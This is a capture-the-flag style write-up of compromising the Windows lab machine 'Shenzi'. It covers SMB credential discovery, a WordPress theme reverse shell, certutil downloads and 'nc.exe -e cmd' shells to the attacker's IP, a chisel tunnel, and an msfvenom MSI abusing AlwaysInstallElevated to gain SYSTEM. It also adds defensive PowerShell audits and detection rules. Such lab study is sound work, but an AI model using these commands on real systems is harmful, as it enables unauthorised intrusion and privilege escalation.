# Shenzi

`wordpress` `chisel` `msi` `AlwaysInstallElevated`

* Machine name: Shenzi
* Difficulty: Intermediate
* OS: Windows

## Enumeration

### NMAP

```
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-03 09:25 EDT
Nmap scan report for 192.168.218.55
Host is up (0.032s latency).
Not shown: 65520 closed tcp ports (conn-refused)
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           FileZilla ftpd 0.9.41 beta
| ftp-syst: 
|_  SYST: UNIX emulated by FileZilla
80/tcp    open  http          Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.218.55/dashboard/
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
443/tcp   open  ssl/http      Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| tls-alpn: 
|_  http/1.1
| http-title: Welcome to XAMPP
|_Requested resource was https://192.168.218.55/dashboard/
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
445/tcp   open  microsoft-ds?
3306/tcp  open  mysql?
| fingerprint-strings: 
|   NULL: 
|_    Host '192.168.45.247' is not allowed to connect to this MariaDB server
5040/tcp  open  unknown
7680/tcp  open  pando-pub?
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.94SVN%I=7%D=8/3%Time=66AE2FED%P=x86_64-pc-linux-gnu%r(
SF:NULL,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.247'\x20is\x20not\x20
SF:allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```

### SMB (139/445)

```
┌──(kali㉿kali)-[~]
└─$ smbclient -L //192.168.218.55       
Password for [WORKGROUP\kali]:

	Sharename       Type      Comment
	---------       ----      -------
	IPC$            IPC       Remote IPC
	Shenzi          Disk   
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 192.168.218.55 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

┌──(kali㉿kali)-[~/oscp/shenzir]
└─$ smbclient //192.168.218.55/Shenzi
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu May 28 11:45:09 2020
  ..                                  D        0  Thu May 28 11:45:09 2020
  passwords.txt                       A      894  Thu May 28 11:45:09 2020
  readme_en.txt                       A     7367  Thu May 28 11:45:09 2020
  sess_klk75u2q4rpgfjs3785h6hpipp      A     3879  Thu May 28 11:45:09 2020
  why.tmp                             A      213  Thu May 28 11:45:09 2020
  xampp-control.ini                   A      178  Thu May 28 11:45:09 2020

		12941823 blocks of size 4096. 4833534 blocks available
smb: \> promp off
smb: \> mget *
getting file \passwords.txt of size 894 as passwords.txt (6.6 KiloBytes/sec) (average 6.6 KiloBytes/sec)
getting file \readme_en.txt of size 7367 as readme_en.txt (53.3 KiloBytes/sec) (average 30.2 KiloBytes/sec)
getting file \sess_klk75u2q4rpgfjs3785h6hpipp of size 3879 as sess_klk75u2q4rpgfjs3785h6hpipp (28.9 KiloBytes/sec) (average 29.8 KiloBytes/sec)
getting file \why.tmp of size 213 as why.tmp (1.6 KiloBytes/sec) (average 22.8 KiloBytes/sec)
getting file \xampp-control.ini of size 178 as xampp-control.ini (1.3 KiloBytes/sec) (average 18.5 KiloBytes/sec)
```

Interesting...

```
┌──(kali㉿kali)-[~/oscp/shenzir]
└─$ cat passwords.txt
### XAMPP Default Passwords ###

1) MySQL (phpMyAdmin):

   User: root
   Password:
   (means no password!)

2) FileZilla FTP:

   [ You have to create a new user on the FileZilla Interface ] 

3) Mercury (not in the USB & lite version): 

   Postmaster: Postmaster (postmaster@localhost)
   Administrator: Admin (admin@localhost)

   User: newuser  
   Password: wampp 

4) WEBDAV: 

   User: xampp-dav-unsecure
   Password: ppmax2011
   Attention: WEBDAV is not active since XAMPP Version 1.7.4.
   For activation please comment out the httpd-dav.conf and
   following modules in the httpd.conf
   
   LoadModule dav_module modules/mod_dav.so
   LoadModule dav_fs_module modules/mod_dav_fs.so  
   
   Please do not forget to refresh the WEBDAV authentification (users and passwords).     

5) WordPress:

   User: admin
   Password: FeltHeadwallWight357
```
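The share above is readable without credentials and holds an XAMPP `passwords.txt`, which is the whole foothold. The following script is an added example (it is not part of the original writeup) showing how an administrator of the target would audit for exactly that exposure: it reports the null-session settings of the server service, every non-administrative share whose ACL allows a broad principal (Everyone, ANONYMOUS LOGON, Guests, Users, Authenticated Users), and any file at the share root whose name suggests credentials. The file-name pattern and the principal list are assumptions to tune; the cmdlets (`Get-SmbShare`, `Get-SmbShareAccess`) come with Windows 8 / Server 2012 and later and need an elevated session.

```powershell
# Added example, not from the original writeup: audit local SMB shares for the kind of
# exposure seen above (an anonymously readable share containing passwords.txt).
# Assumes the SmbShare module (Windows 8 / Server 2012 or later), run as administrator.

# Principals that effectively grant access to "anyone"; accounts are compared by name
# after stripping any domain / BUILTIN prefix. List is an assumption, extend as needed.
$broadPrincipals = @('Everyone', 'ANONYMOUS LOGON', 'Guests', 'Guest', 'Users', 'Authenticated Users')

# File names at the share root worth a second look (constructed heuristic)
$sensitivePattern = 'pass|cred|secret|backup|\.ini$|\.config$|^sess_'

# 1. Null-session configuration of the server service
$lanman = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters' -ErrorAction SilentlyContinue
if ($lanman.RestrictNullSessAccess -eq 0) {
    Write-Warning 'RestrictNullSessAccess = 0: null sessions may reach any share'
}
if ($lanman.NullSessionShares) {
    Write-Warning ('NullSessionShares lists: ' + ($lanman.NullSessionShares -join ', '))
}

# 2. Per-share permissions and a look at the files exposed at the root.
#    Administrative shares (names ending in $) are skipped.
$report = foreach ($share in Get-SmbShare | Where-Object { $_.Name -notmatch '\$$' -and $_.Path }) {
    $broadAces = foreach ($ace in Get-SmbShareAccess -Name $share.Name -ErrorAction SilentlyContinue) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $account = ($ace.AccountName -split '\\')[-1]
        if ($broadPrincipals -contains $account) { "$($ace.AccountName):$($ace.AccessRight)" }
    }
    $suspectFiles = Get-ChildItem -Path $share.Path -File -ErrorAction SilentlyContinue |
        Where-Object { $_.Name -match $sensitivePattern } |
        Select-Object -ExpandProperty Name

    [pscustomobject]@{
        Share        = $share.Name
        Path         = $share.Path
        BroadAccess  = ($broadAces -join '; ')
        SuspectFiles = ($suspectFiles -join ', ')
        # HIGH = anyone can read it AND it contains credential-looking files
        Risk         = if ($broadAces -and $suspectFiles) { 'HIGH' } elseif ($broadAces) { 'MEDIUM' } else { 'low' }
    }
}

$report | Sort-Object Risk | Format-Table -AutoSize
```

On a host configured like Shenzi the `Shenzi` share would come out as HIGH (broad access plus `passwords.txt` and `xampp-control.ini` at the root). The fix is to remove the broad ACE or drop the share entirely, and in any case to delete the XAMPP default-password file rather than rely on share permissions.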

So there is most likely a WordPress site on port 80. Dirsearch and gobuster lead nowhere. After a large number of attempts we try `http://192.168.249.55/shenzi/`.

### WordPress (80)

```
┌──(kali㉿kali)-[~/oscp/shenzir]
└─$ wpscan --url http://192.168.249.55/shenzi/
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
                               
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] Updating the Database ...
[i] Update completed.

[+] URL: http://192.168.249.55/shenzi/ [192.168.249.55]
[+] Started: Sun Aug  4 13:36:39 2024
{...}
[+] admin
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://192.168.249.55/shenzi/wp-json/wp/v2/users/?per_page=100&page=1
 |  Rss Generator (Aggressive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)
```

We found only one user: admin. It could already be seen on the home page of the WordPress site. We have its password from the file found earlier: `FeltHeadwallWight357`.

## Initial access

{% embed url="<https://www.hackercoolmagazine.com/wordpress-reverse-shelling-multiple-methods/>" %}

We will get a reverse shell through the themes.

First, we copy the PHP cmd payload from:

<https://www.revshells.com/>

We copied the code and pasted it into the Twenty Twenty theme, in 404.php.

We then go to `http://192.168.249.55/shenzi/wp-admin/themes/twentytwenty/404.php` and paste the PowerShell #3 (base64) reverse shell from the same site, with our IP address and the matching listening port.

We started a listener at the same time.

```
┌──(kali㉿kali)-[~/oscp/shenzir]
└─$ nc -lnvp 1234
listening on [any] 1234 ...
connect to [192.168.45.180] from (UNKNOWN) [192.168.249.55] 56842
whoami
shenzi\shenzi
PS C:\xampp\htdocs\shenzi>
```

## Privilege escalation

We downloaded winpeas.exe after starting a Python web server on port 80 of our Kali machine, but it was impossible to run it. So we downloaded nc.exe to try with another shell.

```
PS C:\users\shenzi\desktop> certutil -f -urlcache http://192.168.45.180/Tools/winpeas.exe win.exe
PS C:\users\shenzi\desktop> certutil -f -urlcache http://192.168.45.180/Tools/nc.exe nc.exe
PS C:\users\shenzi\desktop> ./nc.exe 192.168.45.180 1235 -e cmd
```
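Everything in the block above (a `certutil -urlcache` download, an `nc.exe ... -e cmd` shell, and earlier a PowerShell process whose parent is Apache) leaves a process-creation trail. The script below is an added example, not part of the original writeup, that turns those observations into simple detection rules over Security event 4688 and runs them first against constructed sample records mirroring the writeup, then against the live log of the host it runs on. It assumes "Audit Process Creation" with command-line logging is enabled (otherwise `CommandLine` is empty and only the parent/child rule fires); the rule names, patterns and sample values are my own.

```powershell
# Added example, not from the original writeup: flag process-creation events matching the
# tooling seen above (certutil -urlcache downloads, nc.exe -e shells, a shell spawned by
# the web server). Assumes Security event 4688 with "Include command line in process
# creation events" enabled. Rules and sample records are constructed.

# Each rule: a name and a script block receiving one hashtable with the 4688 fields
$rules = @(
    @{ Name = 'certutil download'; Test = { $args[0].CommandLine -match '(?i)certutil.*-urlcache' } }
    @{ Name = 'netcat shell';      Test = { $args[0].CommandLine -match '(?i)\bnc(64)?(\.exe)?\b.*\s-e\s' } }
    @{ Name = 'chisel tunnel';     Test = { $args[0].NewProcessName -match '(?i)chisel' } }
    @{ Name = 'shell from httpd';  Test = { $args[0].ParentProcessName -match '(?i)\\(httpd|php-cgi)\.exe$' -and
                                            $args[0].NewProcessName -match '(?i)\\(cmd|powershell)\.exe$' } }
)

function Test-ProcessEvent {
    param([hashtable]$Event)
    # Returns the names of every rule the event triggers (nothing if none)
    foreach ($rule in $rules) {
        if (& $rule.Test $Event) { $rule.Name }
    }
}

function Convert-4688 {
    param([System.Diagnostics.Eventing.Reader.EventRecord]$Record)
    # Flatten the EventData of a 4688 record into a hashtable keyed by field name
    $xml = [xml]$Record.ToXml()
    $fields = @{ TimeCreated = $Record.TimeCreated }
    foreach ($d in $xml.Event.EventData.Data) { $fields[$d.Name] = $d.'#text' }
    $fields
}

# Constructed sample records mirroring the writeup's activity (plus one benign one)
$samples = @(
    @{ SubjectUserName = 'shenzi'; ParentProcessName = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
       NewProcessName = 'C:\Windows\System32\certutil.exe'
       CommandLine = 'certutil -f -urlcache http://192.168.45.180/Tools/nc.exe nc.exe' }
    @{ SubjectUserName = 'shenzi'; ParentProcessName = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
       NewProcessName = 'C:\users\shenzi\desktop\nc.exe'
       CommandLine = './nc.exe 192.168.45.180 1235 -e cmd' }
    @{ SubjectUserName = 'shenzi'; ParentProcessName = 'C:\xampp\apache\bin\httpd.exe'
       NewProcessName = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
       CommandLine = 'powershell -e <base64 payload>' }
    @{ SubjectUserName = 'shenzi'; ParentProcessName = 'C:\Windows\explorer.exe'
       NewProcessName = 'C:\Windows\System32\notepad.exe'; CommandLine = 'notepad.exe readme.txt' }
)

foreach ($s in $samples) {
    $hits = @(Test-ProcessEvent -Event $s)
    if ($hits) { Write-Host ('[sample] {0,-8} {1} <- {2}' -f $s.SubjectUserName, ($hits -join ', '), $s.CommandLine) }
}

# Live: scan the last 24 hours of the Security log on this host
$filter = @{ LogName = 'Security'; Id = 4688; StartTime = (Get-Date).AddHours(-24) }
foreach ($rec in (Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue)) {
    $ev = Convert-4688 -Record $rec
    $hits = @(Test-ProcessEvent -Event $ev)
    if ($hits) { Write-Host ('[live] {0} {1,-8} {2} <- {3}' -f $ev.TimeCreated, $ev.SubjectUserName, ($hits -join ', '), $ev.CommandLine) }
}
```

The three constructed attacker samples each trigger one rule and the notepad sample triggers none. The "shell from httpd" rule is the most robust of the four, since it does not depend on the attacker's choice of tool: a web server account should never spawn `cmd.exe` or `powershell.exe`.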

```
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1235                      
listening on [any] 1235 ...
connect to [192.168.45.180] from (UNKNOWN) [192.168.249.55] 56917
Microsoft Windows [Version 10.0.19042.1526]
(c) Microsoft Corporation. All rights reserved.

C:\users\shenzi\desktop>win.exe
win.exe
ANSI color bit for Windows is not set. If you are executing this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
Long paths are disabled, so the maximum length of a path supported is 260 chars (this may cause false negatives when looking for files). If you are admin, you can enable it with 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
{...}

╔══════════╣ Found Wordpress Files
File: C:\xampp\htdocs\shenzi\wp-config.php
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'shenzi' );
/** MySQL database username */
define( 'DB_USER', 'root' );
/** MySQL database password */
define( 'DB_PASSWORD', '' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
define('WP_SITEURL', 'http://' . $_SERVER['HTTP_HOST'] . '/shenzi/');
define('WP_HOME', 'http://' . $_SERVER['HTTP_HOST'] . '/shenzi/');

{...}
```

It works. We also came across MySQL again, with the root user and no password.

```
C:\users\shenzi\desktop>powershell -ep bypass
powershell -ep bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\users\shenzi\desktop> Get-ChildItem -Path "C:\" -Recurse -File -include "*mysql.exe*" -ErrorAction SilentlyContinue

    Directory: C:\xampp\mysql\bin
Mode                 LastWriteTime         Length Name                       
----                 -------------         ------ ----                       
-a----        12/10/2019   6:49 AM        3742632 mysql.exe
```

We cannot run it.

I will try port forwarding to get access to MySQL and phpMyAdmin.

Victim machine:

```
C:\users\shenzi\desktop>chisel server -p 7777 -reverse
chisel server -p 7777 -reverse
2024/08/04 11:42:41 server: Reverse tunnelling enabled
2024/08/04 11:42:41 server: Fingerprint uh8e6jJeT5akIYbRhOg4jRAeMcf6+gt4c13gfViXQKA=
2024/08/04 11:42:41 server: Listening on http://0.0.0.0:7777
```

Kali machine:

```
┌──(kali㉿kali)-[~/Tools]
└─$ ./chisel client 192.168.249.55:7777 3333:localhost:3306
2024/08/04 14:44:26 client: Connecting to ws://192.168.249.55:7777
2024/08/04 14:44:27 client: Connected (Latency 32.808945ms)
```

7777: the port used to link the two machines. 3306: the port I am interested in on the target. 3333: the local port I will use to reach port 3306 on the target.

We found nothing conclusive through port 3306. We also looked at port 80, in particular the phpMyAdmin page, and found nothing either. We also tried uploading a PHP file that would let us execute commands, but we are still shenzi.

{% embed url="<https://www.hackingarticles.in/shell-uploading-web-server-phpmyadmin/>" %}

So we have no lead.

Let's go back to our dear WinPEAS.exe. We did indeed miss a piece of information:

```
AlwaysInstallElevated set to 1 in HKLM!
AlwaysInstallElevated set to 1 in HKCU!
```

We will once again rely on HackTricks, except that we will create a reverse shell rather than add a user. In either case the generated file will be an .msi.

{% embed url="<https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#alwaysinstallelevated>" %}
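The two WinPEAS lines are the whole story: Windows Installer runs packages as SYSTEM only when `AlwaysInstallElevated` is 1 in both the HKLM and the HKCU policy key, which is why a standard user's `.msi` ends as `nt authority\system` below. The script that follows is an added example, not part of the original writeup or of HackTricks, written from the administrator's side: it reads both values, explains whether the pair is exploitable, optionally resets them to 0 with `-Remediate`, and lists recent MsiInstaller events so that an unexpected install can be spotted. It assumes an elevated session for the HKLM write; the registry paths and the event IDs (1033, 11707) are the standard ones.

```powershell
# Added example, not from the original writeup: check whether this host has the
# AlwaysInstallElevated misconfiguration WinPEAS reported above, optionally fix it, and
# list recent Windows Installer activity. Assumes an elevated PowerShell session for the
# HKLM write; the event IDs are the standard MsiInstaller ones in the Application log.

param([switch]$Remediate)

$keys = @{
    HKLM = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    HKCU = 'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
}

function Get-AlwaysInstallElevated {
    # Returns 0 when the value or key is absent (the policy default), else the DWORD value
    $state = @{}
    foreach ($hive in $keys.Keys) {
        $item = Get-ItemProperty -Path $keys[$hive] -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
        $state[$hive] = if ($null -eq $item) { 0 } else { [int]$item.AlwaysInstallElevated }
    }
    $state
}

$state = Get-AlwaysInstallElevated
Write-Host ('AlwaysInstallElevated  HKLM={0}  HKCU={1}' -f $state.HKLM, $state.HKCU)

# Windows Installer only honours the policy when BOTH values are 1; a single 1 is
# still policy drift and worth cleaning up.
if ($state.HKLM -eq 1 -and $state.HKCU -eq 1) {
    Write-Warning 'Any MSI installed by a standard user runs as SYSTEM on this host'
} elseif ($state.HKLM -eq 1 -or $state.HKCU -eq 1) {
    Write-Warning 'Policy is half-enabled; only one hive is set'
}

if ($Remediate) {
    foreach ($hive in $keys.Keys) {
        if ($state[$hive] -eq 1) {
            Set-ItemProperty -Path $keys[$hive] -Name AlwaysInstallElevated -Value 0 -Type DWord
            Write-Host "Set $hive AlwaysInstallElevated to 0"
        }
    }
    # The value is normally delivered by GPO (Computer/User Configuration > Administrative
    # Templates > Windows Components > Windows Installer > "Always install with elevated
    # privileges"); fix the policy source too or the setting will come back at next refresh.
}

# Recent MSI installs: 1033 = Windows Installer installed the product,
# 11707 = installation completed successfully. Look for products nobody recognises
# or installs performed by accounts that only run a web server.
$filter = @{ LogName = 'Application'; ProviderName = 'MsiInstaller'; Id = 1033, 11707; StartTime = (Get-Date).AddDays(-7) }
Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
    Select-Object TimeCreated, Id, UserId, @{ n = 'Message'; e = { ($_.Message -split "`n")[0] } } |
    Format-Table -AutoSize
```

Run without arguments it is read-only and safe to include in a periodic baseline check; `-Remediate` only writes where a value is actually 1. Note that the HKCU half is read for the current user only, so on a shared host the check has to be repeated in the context of each interactive account, or the HKLM half alone should be treated as the finding.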

```
┌──(kali㉿kali)-[~]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.180 LPORT=4444 -f msi -o rev.msi
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of msi file: 159744 bytes
Saved as: rev.msi
```

We download it to the target machine and run it.

```
PS C:\xampp\htdocs\shenzi> cd /users/shenzi/desktop
PS C:\users\shenzi\desktop> certutil -f -urlcache http://192.168.45.180/rev.msi rev.msi
****  Online  ****
CertUtil: -URLCache command completed successfully.
PS C:\users\shenzi\desktop> ./rev.msi
```

```
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 4444                    
listening on [any] 4444 ...
connect to [192.168.45.180] from (UNKNOWN) [192.168.249.55] 57705
Microsoft Windows [Version 10.0.19042.1526]
(c) Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
whoami
nt authority\system
```

We are NT AUTHORITY\SYSTEM!
